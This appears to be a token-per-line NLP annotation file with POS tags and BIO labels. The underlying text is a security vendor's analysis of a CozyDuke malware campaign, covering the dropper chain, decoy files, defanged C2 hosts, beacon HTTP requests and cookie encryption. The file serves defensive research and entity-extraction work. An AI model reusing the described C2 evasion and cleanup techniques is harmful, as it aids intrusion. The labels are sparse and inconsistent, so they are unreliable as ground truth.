Unit NN O
42 CD O
has VBZ O
uncovered VBN O
a DT O
new JJ O
campaign NN O
from IN O
the DT O
CozyDuke NNP O
threat NN O
actors NNS O
, , O
aka RB O
CozyCar NNP O
[ -LRB- O
1 CD O
] -RRB- O
, , O
leveraging VBG O
malware NN O
that WDT O
appears VBZ O
to TO O
be VB O
related VBN O
to IN O
the DT O
Seaduke NNP O
malware NN O
described VBN O
earlier RBR O
this DT O
week NN O
by IN O
Symantec NNP O
. . O

[ -LRB- O
2 CD O
] -RRB- O
This DT O
campaign NN O
, , O
which WDT O
began VBD O
on IN O
July NNP O
7 CD O
, , O
2015 CD O
, , O
appears VBZ O
to TO O
be VB O
targeted VBN O
at IN O
government NN O
organizations NNS O
and CC O
think VB O
- HYPH O
tanks NNS O
located VBN O
in IN O
democratic JJ O
countries NNS O
[ -LRB- O
3 CD O
] -RRB- O
, , O
and CC O
utilizes VBZ B-Action
compromised VBN O
, , B-Entity
legitimate JJ I-Entity
websites NNS I-Entity
for IN B-Modifier
spear NN O
phishing VBG B-Entity
and CC O
command NN O
and CC O
control NN O
activity NN O
. . O

Unit NN O
42 CD O
discovered VBD O
the DT O
extent NN O
of IN O
this DT O
attack NN O
using VBG O
the DT O
Palo NNP O
Alto NNP O
Networks NNP O
AutoFocus NNP O
service NN O
, , O
which WDT O
allows VBZ O
analysts NNS O
to TO O
quickly RB O
find VB O
correlations NNS O
among IN O
malware JJ O
samples NNS O
analyzed VBN O
by IN O
WildFire NNP O
. . O

All DT O
files NNS O
referenced VBD O
throughout IN O
the DT O
analysis NN O
are VBP O
contained VBN O
in IN O
the DT O
IOC NNP O
table NN O
at IN O
the DT O
end NN O
of IN O
this DT O
blog NN O
. . O

The DT O
current JJ B-Entity
CozyCar NNP I-Entity
campaign NN I-Entity
includes VBZ B-Action
spear NN O
phishing VBG B-Entity
emails NNS I-Entity
that WDT I-Entity
deliver VBP I-Entity
the DT I-Entity
payload NN I-Entity
from IN I-Entity
either CC I-Entity
by IN I-Entity
a DT I-Entity
link NN I-Entity
to IN I-Entity
a DT I-Entity
.zip CD I-Entity
file NN I-Entity
on IN I-Entity
a DT I-Entity
compromised VBN I-Entity
website NN I-Entity
or CC I-Entity
by IN I-Entity
direct JJ I-Entity
delivery NN I-Entity
as IN I-Entity
an DT I-Entity
attachment NN I-Entity
to IN I-Entity
the DT I-Entity
phish JJ I-Entity
. . O

At IN O
the DT O
time NN O
of IN O
our PRP$ O
analysis NN O
, , O
the DT O
phishing NN O
link NN O
was VBD O
no RB O
longer RBR O
active JJ O
. . O

When WRB O
a DT O
user NN O
opens VBZ O
the DT O
attached VBN O
file NN O
a DT O
poorly RB O
detected VBN O
executable JJ O
file NN O
[ -LRB- O
VT NNP O
1/54 NNP O
] -RRB- O
is VBZ O
extracted VBN O
. . O

The DT O
initial JJ O
dropper NN O
is VBZ O
a DT O
self NN O
- HYPH O
extracting VBG O
archive NN O
( -LRB- O
SFX NNP O
) -RRB- O
. . O

Upon IN O
execution NN O
, , O
this DT O
executable JJ O
file NN O
will MD O
drop VB O
two CD O
files NNS O
in IN O
the DT O
% NN O
TEMP% NNP O
directory NN O
: : O
a DT O
decoy NN O
.wav CD O
file NN O
and CC O
the DT O
secondary JJ O
dropper NN O
. . O

The DT O
CozyDuke NNP O
group NN O
commonly RB O
uses VBZ O
legitimate JJ O
media NNS O
files NNS O
to TO O
trick VB O
users NNS O
. . O

In IN O
reality NN O
, , O
while IN O
the DT O
media NNS O
- : O
a DT O
.wav JJ O
file NN O
with IN O
a DT O
female JJ O
voice NN O
claiming VBG O
to TO O
be VB O
a DT O
reporter NN O
looking VBG O
for IN O
commentary NN O
- HYPH O
is VBZ O
played VBN O
, , O
the DT O
secondary JJ O
dropper NN O
executes VBZ O
in IN O
the DT O
background NN O
. . O

The DT O
secondary JJ O
dropper NN O
requests VBZ O
a DT O
.swf CD O
file NN O
using VBG O
SSL NNP O
as IN O
illustrated VBN O
in IN O
the DT O
HTTP NNP O
traffic NN O
below RB O
. . O

As IN O
of IN O
this DT O
writing NN O
, , O
the DT O
domain NN O
extranet.qualityplanning[.]com NNP O
resolved VBD O
to IN O
64.244.34[.]200 CD O
. . O

GET VB O
/webscriptsecurity . O
/ SYM O
view/4/player.swf IN O
HTTP/1.1 NNP O
Accept NNP O
: : O
text NN O
/ , O
html NN O
, , O
application NN O
/ SYM O
xhtml+xml,*/ NN O
* NFP O
Accept NNP O
- HYPH O
Language NNP O
: : O
en_US CD O
User NN O
- HYPH O
Agent NN O
: : O
Mozilla/5.0 NNP O
( -LRB- O
compatible JJ O
; : O
MSIE NNP O
8.0 CD O
; : O
Windows NNP O
NT NNP O
5.1 CD O
; : O
Trident/4.0 CD O
; : O
.NET CD O
CLR NNP O
1.1.4322 CD O
; : O
.NET CD O
CLR NNP O
2.0.50727 CD O
) -RRB- O
Host NN O
: : O
extranet.qualityplanning[.]com ADD O
Connection NN O
: : O
Keep VB O
- HYPH O
Alive JJ O
GET NNP O
/webscriptsecurity NNP O
/ SYM O
view/4/player.swf IN O
HTTP/1.1 NNP O
Accept NNP O
: : O
text NN O
/ , O
html NN O
, , O
application NN O
/ SYM O
xhtml+xml,*/ NN O
* NFP O
Accept NNP O
- HYPH O
Language NNP O
: : O
en_US CD O
User NN O
- HYPH O
Agent NN O
: : O
Mozilla/5.0 NNP O
( -LRB- O
compatible JJ O
; : O
MSIE NNP O
8.0 CD O
; : O
Windows NNP O
NT NNP O
5.1 CD O
; : O
Trident/4.0 CD O
; : O
.NET CD O
CLR NNP O
1.1.4322 CD O
; : O
.NET CD O
CLR NNP O
2.0.50727 CD O
) -RRB- O
Host NN O
: : O
extranet.qualityplanning[.]com ADD O
Connection NN O
: : O
Keep VB O
- HYPH O
Alive JJ O
The DT B-Entity
secondary JJ I-Entity
dropper NN I-Entity
then RB O
cleans VBZ B-Action
up RP I-Action
after IN B-Modifier
itself PRP B-Entity
with IN B-Modifier
a DT O
simple JJ B-Entity
vbs NN I-Entity
script NN I-Entity
( -LRB- O
md5:0d132ee171768dc30d14590ed2dbadd1 NNP O
) -RRB- O
that WDT O
leaves VBZ O
only RB O
the DT O
decoy NN O
multimedia NNS O
file NN O
behind RB O
. . O

But CC O
what WP O
did VBD O
the DT O
dropper NN O
do VBP O
with IN O
the DT O
.swf NNS O
file NN O
? . O
While IN O
the DT O
player.swf NNS O
file NN O
downloaded VBN O
by IN O
the DT O
second JJ O
stage NN O
dropper NN O
does VBZ O
contain VB O
media NNS O
, , O
it PRP O
is VBZ O
, , O
again RB O
, , O
a DT O
decoy NN O
. . O

The DT O
actual JJ O
flash NN O
component NN O
of IN O
this DT O
file NN O
is VBZ O
roughly RB O
16 CD O
kb NN O
, , O
leaving VBG O
approximately RB O
200 CD O
kb NN O
of IN O
the DT O
file NN O
unaccounted JJ O
for IN O
. . O

The DT O
second JJ O
stage NN O
dropper NN O
contains VBZ O
decoding NN O
routines NNS O
that WDT O
decode VBP O
the DT O
arbitrary JJ O
binary NN O
data NNS O
into IN O
an DT O
executable JJ O
file NN O
. . O

The DT O
executable JJ O
file NN O
is VBZ O
dropped VBN O
in IN O
% NN O
appdata%/Roaming VBG O
and CC O
appears VBZ O
to TO O
try VB O
and CC O
emulate VB O
legitimate JJ O
software NN O
names NNS O
: : O
TimbuktuDaemon NNP O
, , O
SearchIndexer NNP O
, , O
RtkAudioService64 NNP O
, , O
dirmngr NN O
, , O
o2flash NN O
, , O
and CC O
usbrefs64 JJ O
. . O

This DT O
file NN O
was VBD O
not RB O
observed VBN O
on IN O
VirusTotal NNP O
until IN O
July NNP O
9 CD O
and CC O
has VBZ O
extremely RB O
low JJ O
detection NN O
rates NNS O
[ -LRB- O
VT NNP O
: : O
3/54 CD O
] -RRB- O
. . O

It PRP O
appears VBZ O
that IN O
the DT O
authors NNS O
of IN O
this DT O
particular JJ O
iteration NN O
of IN O
the DT O
CozyCar NNP O
group NN O
's POS O
malware NN O
internally RB O
call VBP O
it PRP O
" `` O
miniDionis FW O
" '' O
according VBG O
to IN O
pdb NN O
strings NNS O
left VBN O
in IN O
the DT O
binary NN O
( -LRB- O
c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb NN O
) -RRB- O
. . O

It PRP O
also RB O
appears VBZ O
to TO O
be VB O
an DT O
iteration NN O
on IN O
the DT O
" `` O
forkmeimfamous JJ O
" '' O
aka RB O
Seaduke NNP O
malware NN O
analyzed VBN O
by IN O
Unit NNP O
42 CD O
in IN O
a DT O
previous JJ O
blog NN O
[ -LRB- O
4 CD O
] -RRB- O
. . O

The DT O
malware NN O
stores NNS O
2 CD O
files NNS O
in IN O
the DT O
% NN O
temp% JJ O
directory NN O
: : O
a DT O
configuration NN O
file NN O
and CC O
a DT O
secondary JJ O
dll NN O
. . O

The DT O
configuration NN O
file NN O
's POS O
name NN O
matches VBZ O
the DT O
final JJ O
characters NNS O
of IN O
the DT O
bot_id NN O
that WDT O
is VBZ O
contained VBN O
within IN O
as IN O
per IN O
the DT O
sample NN O
below RB O
. . O

Analysis NN O
of IN O
the DT B-Entity
secondary JJ I-Entity
dll NN I-Entity
file NN I-Entity
( -LRB- O
name NN O
matches VBZ O
[ -LRB- O
A NN O
- HYPH O
Z0 NN O
- HYPH O
9]{1}\.tmp NN O
) -RRB- O
indicates VBZ O
that IN O
its PRP$ O
primary JJ O
function NN O
is VBZ O
to TO O
serve VB B-Action
as IN B-Modifier
a DT O
cleanup NN B-Entity
mechanism NN I-Entity
for IN I-Entity
the DT I-Entity
dropped VBN I-Entity
binary JJ I-Entity
. . O

This DT O
is VBZ O
likely JJ O
an DT O
attempt NN O
to TO O
thwart VB O
forensic JJ O
investigations NNS O
. . O

Further JJ O
examination NN O
of IN O
memory NN O
dumps VBZ O
taken VBN O
following VBG O
the DT O
execution NN O
of IN O
miniDionis NNP O
reveals VBZ O
some DT O
clues NNS O
into IN O
the DT O
beaconing NN O
activity NN O
exhibited VBD O
. . O

The DT O
malware NN O
stores NNS O
configuration NN O
values NNS O
in IN O
memory NN O
as IN O
key JJ O
: : O
value NN O
pairs NNS O
. . O

The DT O
configuration NN O
of IN O
miniDionis NNP O
is VBZ O
a DT O
JSON NNP O
blob NN O
with IN O
several JJ O
important JJ O
sections NNS O
, , O
which WDT O
are VBP O
described VBN O
in IN O
the DT O
table NN O
below RB O
. . O

The DT O
functional JJ O
payload NN O
of IN O
this DT O
Trojan NNP O
starts VBZ O
by IN O
creating VBG O
a DT O
Mutex NNP O
by IN O
splitting VBG O
the DT O
" `` O
bot_id NN O
" '' O
value NN O
in IN O
the DT O
configuration NN O
on IN O
the DT O
hyphen NN O
( -LRB- O
" `` O
- : O
" '' O
) -RRB- O
and CC O
using VBG O
the DT O
second JJ O
portion NN O
of IN O
the DT O
split NN O
string NN O
( -LRB- O
specifically RB O
, , O
" '' O
01MRLXW NN O
" '' O
in IN O
the DT O
case NN O
of IN O
this DT O
configuration NN O
) -RRB- O
. . O

From IN O
a DT O
functionality NN O
standpoint NN O
, , O
the DT O
Trojan NNP O
uses VBZ O
the DT O
concept NN O
of IN O
tasks NNS O
that WDT O
are VBP O
processed VBN O
and CC O
completed VBN O
using VBG O
a DT O
pool NN O
of IN O
threads NNS O
. . O

To TO O
obtain VB O
tasks NNS O
, , O
the DT B-Entity
Trojan NNP I-Entity
will MD O
issue VB B-Action
an DT O
HTTPS NNP B-Entity
request NN I-Entity
to IN B-Modifier
the DT O
C2 NNP B-Entity
server NN I-Entity
( -LRB- O
" `` O
host_scripts NNS O
" '' O
in IN O
the DT O
configuration NN O
) -RRB- O
that WDT O
resembles VBZ O
the DT O
following VBG O
example NN O
beacon NN O
. . O

GET VB O
/mobile . O
/ SYM O
viewer.php IN O
HTTP/1.1 NNP O
Accept NNP O
: : O
* NFP O
/ NFP O
* NFP O
Accept IN O
- HYPH O
Language NN O
: : O
en IN O
- HYPH O
US NNP O
User NNP O
- HYPH O
Agent NNP O
: : O
Mozilla/5.0 NNP O
( -LRB- O
Windows NNP O
NT NNP O
6.1 CD O
; : O
WOW64 CD O
; : O
Trident/7.0 DT O
; : O
rv:11.0 LS O
) -RRB- O
like IN O
Gecko NNP O
Host NN O
: : O
www.illuminatistudios[.]net ADD O
Cookie NN O
: : O
SSID NN O
= SYM O
sLW5XoHJDwU3YxCRzwsEnfPPksD1sggcC8 CD O
- HYPH O
25A CD O
Accept NNP O
- HYPH O
Encoding NNP O
: : O
gzip NN O
, , O
deflate VB O
Connection NN O
: : O
Keep VB O
- HYPH O
Alive JJ O
GET NNP O
/mobile . O
/ SYM O
viewer.php IN O
HTTP/1.1 NNP O
Accept NNP O
: : O
* NFP O
/ NFP O
* NFP O
Accept IN O
- HYPH O
Language NN O
: : O
en IN O
- HYPH O
US NNP O
User NNP O
- HYPH O
Agent NNP O
: : O
Mozilla/5.0 NNP O
( -LRB- O
Windows NNP O
NT NNP O
6.1 CD O
; : O
WOW64 CD O
; : O
Trident/7.0 DT O
; : O
rv:11.0 LS O
) -RRB- O
like IN O
Gecko NNP O
Host NN O
: : O
www.illuminatistudios[.]net ADD O
Cookie NN O
: : O
SSID NN O
= SYM O
sLW5XoHJDwU3YxCRzwsEnfPPksD1sggcC8 CD O
- HYPH O
25A CD O
Accept NNP O
- HYPH O
Encoding NNP O
: : O
gzip NN O
, , O
deflate VB O
Connection NN O
: : O
Keep VB O
- HYPH O
Alive JJ O
The DT O
Trojan NNP O
manually RB O
creates VBZ O
the DT O
cookie NN O
in IN O
this DT O
HTTP NNP O
request NN O
. . O

The DT O
cookie NN O
contains VBZ O
ciphertext NN O
that IN O
the DT O
Trojan NNP O
creates VBZ O
based VBN O
on IN O
the DT O
" `` O
bot_id NN O
" '' O
in IN O
the DT O
JSON NNP O
configuration NN O
. . O

The DT O
Trojan NNP O
compresses VBZ O
the DT O
" `` O
bot_id NN O
" '' O
string NN O
using VBG O
zlib NN O
and CC O
then RB O
encrypts VBZ O
it PRP O
using VBG O
the DT O
RC4 NNP O
algorithm NN O
using VBG O
a DT O
generated VBN O
key NN O
. . O

The DT O
generated VBN O
key NN O
is VBZ O
a DT O
SHA1 NNP O
hash NN O
of IN O
two CD O
randomly RB O
created VBD O
strings NNS O
: : O
the DT O
first JJ O
of IN O
which WDT O
is VBZ O
between IN O
2 CD O
and CC O
8 CD O
bytes NNS O
long JJ O
and CC O
the DT O
second NN O
is VBZ O
between IN O
1 CD O
and CC O
7 CD O
characters NNS O
in IN O
length NN O
. . O

The DT O
ciphertext NN O
of IN O
the DT O
" `` O
bot_id NN O
" '' O
is VBZ O
then RB O
based64 CD O
encoded JJ O
and CC O
finally RB O
the DT O
appended JJ O
to IN O
the DT O
" `` O
cookie_name NN O
" '' O
( -LRB- O
" `` O
SSID= NNP O
" '' O
) -RRB- O
in IN O
the DT O
configuration NN O
and CC O
sent VBD O
within IN O
the DT O
HTTP NNP O
request NN O
to IN O
the DT O
C2 NNP O
server NN O
. . O

Unit NNP O
42 CD O
did VBD O
not RB O
observe VB O
the DT O
first JJ O
random JJ O
string NN O
( -LRB- O
between IN O
2 CD O
and CC O
8 CD O
characters NNS O
in IN O
length NN O
) -RRB- O
sent VBD O
to IN O
the DT O
C2 NNP O
in IN O
the DT O
first JJ O
beacon NN O
, , O
which WDT O
would MD O
be VB O
required VBN O
by IN O
the DT O
C2 NNP O
to TO O
reproduce VB O
the DT O
exact JJ O
SHA1 NNP O
hash NN O
used VBD O
as IN O
a DT O
key NN O
to TO O
generate VB O
the DT O
ciphertext NN O
in IN O
the DT O
cookie NN O
. . O

Upon IN O
further JJ O
examination NN O
we PRP O
believe VBP O
that IN O
the DT O
C2 NNP O
will MD O
not RB O
be VB O
able JJ O
to TO O
decrypt VB O
the DT O
cookie NN O
in IN O
the DT O
first JJ O
beacon NN O
. . O

Instead RB O
, , O
the DT O
C2 NNP O
will MD O
respond VB O
to IN O
the DT O
first JJ O
beacon NN O
with IN O
data NNS O
that WDT O
the DT O
Trojan NNP O
will MD O
use VB O
to TO O
extract VB O
a DT O
string NN O
, , O
using VBG O
a DT O
function NN O
named VBN O
TrExtractKey NNP O
seen VBN O
in IN O
Figure NN O
2 CD O
, , O
to TO O
replace VB O
the DT O
first JJ O
random JJ O
string NN O
used VBN O
to TO O
generate VB O
the DT O
SHA1 JJ O
hash NN O
. . O

Once IN O
the DT O
C2 NNP O
and CC O
Trojan NNP O
have VBP O
synchronized VBN O
using VBG O
this DT O
string NN O
, , O
the DT O
C2 NNP O
will MD O
be VB O
able JJ O
to TO O
decrypt VB O
subsequent JJ O
network NN O
beacons NNS O
because IN O
the DT O
Trojan NNP O
includes VBZ O
the DT O
random JJ O
string NN O
between IN O
1 CD O
and CC O
7 CD O
characters NNS O
that WDT O
makes VBZ O
up RP O
the DT O
second JJ O
half NN O
of IN O
the DT O
SHA1 NNP O
hash NN O
within IN O
the DT O
cookie NN O
field NN O
before IN O
the DT O
ciphertext NN O
. . O

The DT O
C2 NNP O
communications NNS O
, , O
and CC O
several JJ O
of IN O
the DT O
commands NNS O
we PRP O
will MD O
discuss VB O
in IN O
this DT O
blog NN O
, , O
include VBP O
a DT O
rather RB O
interesting JJ O
technique NN O
to TO O
manually RB O
handle VB O
HTTP NNP O
redirection NN O
, , O
such JJ O
as IN O
the DT O
HTTP NNP O
301 CD O
Moved NNP O
Permanently NNP O
and CC O
HTTP NNP O
302 CD O
Found VBD O
status NN O
codes NNS O
. . O

The DT O
technique NN O
used VBD O
to TO O
handle VB O
these DT O
redirections NNS O
involves VBZ O
checking VBG O
for IN O
the DT O
presence NN O
of IN O
a DT O
" `` O
Location NN O
" '' O
field NN O
within IN O
the DT O
HTTP NNP O
headers NNS O
of IN O
the DT O
server NN O
response NN O
, , O
then RB O
using VBG O
regular JJ O
expressions NNS O
to TO O
parse VB O
the DT O
HTML NN O
within IN O
server NN O
response NN O
to TO O
find VB O
the DT O
appropriate JJ O
URL NN O
. . O

The DT O
code NN O
contains VBZ O
three CD O
regular JJ O
expressions NNS O
to TO O
parse VB O
the DT O
HTML NN O
to TO O
locate VB O
the DT O
URL NNP O
, , O
the DT O
first JJ O
of IN O
which WDT O
is VBZ O
" `` O
< XX O
a.*?>.*?</a JJ O
> XX O
" '' O
that WDT O
locates VBZ O
all DT O
of IN O
the DT O
tags NNS O
associated VBN O
with IN O
link NN O
within IN O
the DT O
HTML NNP O
. . O

The DT O
second JJ O
regular JJ O
expression NN O
of IN O
" `` O
onclick=\"Accept();\ JJ O
" '' O
" `` O
locates VBZ O
only RB O
links NNS O
within IN O
the DT O
HTML NNP O
with IN O
a DT O
specific JJ O
" `` O
onclick NN O
" '' O
action NN O
. . O

The DT O
last JJ O
regular JJ O
expression NN O
of IN O
" `` O
href\\s*=\\s*(?:[\"'](?<1>[^\"']*)[\"']|(?<1>\\S+ ADD O
) -RRB- O
) -RRB- O
" `` O
to TO O
obtain VB O
the DT O
correct JJ O
URL NNP O
to TO O
interact VB O
with IN O
as IN O
the DT O
C2 NNP O
server NN O
. . O

Once IN O
the DT O
C2 NNP O
and CC O
Trojan NNP O
have VBP O
synchronized VBN O
and CC O
can MD O
decrypt VB O
their PRP$ O
network NN O
communications NNS O
the DT B-Entity
C2 NNP I-Entity
server NN I-Entity
will MD O
begin VB O
responding VBG B-Action
to IN B-Modifier
beacons NNS O
from IN B-Entity
the DT I-Entity
Trojan NNP I-Entity
with IN B-Modifier
JSON NNP O
blobs VBZ B-Entity
. . O

Unit NN O
42 CD O
has VBZ O
not RB O
received VBN O
any DT O
JSON NNP O
blobs NN O
from IN O
an DT O
active JJ O
C2 NNP O
server NN O
, , O
but CC O
based VBN O
on IN O
static JJ O
analysis NN O
of IN O
the DT O
Trojan NNP O
determined VBD O
the DT O
JSON NNP O
would MD O
look VB O
as IN O
follows VBZ O
. . O

{ -LRB- O
' `` O
tasks NNS O
' '' O
: : O
[ -LRB- O
{ -LRB- O
' `` O
task_id FW O
' '' O
: : O
" '' O
" `` O
, , O
' '' O
task_data NN O
' '' O
: : O
{ -LRB- O
' `` O
command NN O
' '' O
: : O
" '' O
" `` O
, , O
' '' O
data NNS O
' '' O
: : O
" '' O
" `` O
} -RRB- O
} -RRB- O
, , O
] -RRB- O
} -RRB- O
{ -LRB- O
' `` O
tasks NNS O
' '' O
: : O
[ -LRB- O
{ -LRB- O
' `` O
task_id FW O
' '' O
: : O
" '' O
" `` O
, , O
' '' O
task_data NN O
' '' O
: : O
{ -LRB- O
' `` O
command NN O
' '' O
: : O
" '' O
" `` O
, , O
' '' O
data NNS O
' '' O
: : O
" '' O
" `` O
} -RRB- O
} -RRB- O
, , O
] -RRB- O
} -RRB- O
The DT O
Trojan NNP O
takes VBZ O
this DT O
JSON NNP O
blob NN O
and CC O
adds VBZ O
each DT O
task NN O
in IN O
the DT O
list NN O
into IN O
a DT O
pool NN O
for IN O
processing NN O
. . O

Separate JJ O
worker NN O
threads NNS O
access VBP O
this DT O
pool NN O
of IN O
tasks NNS O
and CC O
process NN O
the DT O
commands NNS O
and CC O
perform VB O
the DT O
necessary JJ O
activities NNS O
. . O

Unit NNP O
42 CD O
analyzed VBD O
the DT O
Trojan NNP O
's POS O
command NN O
handler NN O
and CC O
found VBD O
several JJ O
commands NNS O
, , O
as IN O
seen VBN O
in IN O
Table NNP O
2 CD O
, , O
which WDT O
allows VBZ B-Action
the DT O
threat NN B-Entity
actors NNS I-Entity
to IN B-Modifier
carry VBP O
out RP B-Entity
a DT I-Entity
full JJ I-Entity
range NN I-Entity
of IN I-Entity
activities NNS I-Entity
on IN I-Entity
the DT I-Entity
system NN I-Entity
. . O

The DT O
actors NNS O
behind IN O
the DT O
CozyDuke NNP O
framework NN O
are VBP O
highly RB O
sophisticated JJ O
, , O
motivated JJ O
, , O
and CC O
have VBP O
become VBN O
increasingly RB O
bold JJ O
in IN O
their PRP$ O
campaigns NNS O
. . O

We PRP O
recommend VBP O
that IN O
other JJ O
security NN O
practitioners NNS O
review VBP O
the DT O
included VBN O
Indicators NNP O
of IN O
Compromise NNP O
( -LRB- O
IoCs NNP O
) -RRB- O
to TO O
ensure VB O
they PRP O
have VBP O
not RB O
been VBN O
targets NNS O
in IN O
this DT O
campaign NN O
, , O
and CC O
add VB O
the DT O
appropriate JJ O
security NN O
controls NNS O
to TO O
prevent VB O
future JJ O
attacks NNS O
. . O

This DT O
group NN O
is VBZ O
reliant JJ O
on IN O
social JJ O
engineering NN O
, , O
and CC O
thus RB O
, , O
user NN O
education NN O
remains VBZ O
of IN O
paramount JJ O
importance NN O
. . O

Palo NNP O
Alto NNP O
Networks NNP O
customers NNS O
using VBG O
WildFire NNP O
were VBD O
protected VBN O
from IN O
this DT O
campaign NN O
. . O

All DT O
known VBN O
elements NNS O
of IN O
this DT O
campaign NN O
have VBP O
been VBN O
accurately RB O
identified VBN O
by IN O
WildFire NNP O
as IN O
malicious JJ O
. . O

IOCs NNS O
Sources NNPS O
[ -LRB- O
1 CD O
] -RRB- O
https://securelist.com/blog/research/69731/the-cozyduke-apt/ ADD O
[ -LRB- O
2 CD O
] -RRB- O
http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory ADD O
[ -LRB- O
3 CD O
] -RRB- O
http://www.theregister.co.uk/2015/04/22/cozyduke_hackers_white_house_state_dept_malware/ ADD O
[ -LRB- O
4 CD O
] -RRB- O
http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/ ADD O

